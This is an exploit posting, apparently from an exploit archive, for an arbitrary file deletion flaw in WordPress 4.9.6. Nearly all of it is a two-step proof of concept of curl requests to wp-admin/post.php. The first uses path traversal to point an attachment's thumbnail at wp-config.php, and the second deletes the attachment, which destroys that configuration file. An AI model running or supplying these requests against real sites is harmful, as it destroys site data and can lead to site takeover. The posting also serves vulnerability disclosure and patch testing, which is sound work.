facebook facebook twitter rss

Wordpress 4.9.6 Arbitrary File Deletion Vulnerability

Author: Rednofozi , Published: 06-09-2018
# Exploit Title: Wordpress 4.9.6 Arbitrary File Deletion Vulnerability
# Google Dork: N/A
# Date: 2018-09-3
# Exploit Author: Rednofozi
# Vendor Homepage: http://www.wordpress.org
# Software Link:http://www.wordpress.org/download
# Affected Version: 4.9.6
# Tested on: php7 mysql5
# CVE : N/A

# Proof Of Concept
**************************************************************************

Step 1:

```
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
```

Step 2:

```
curl -v 'http://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
```
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :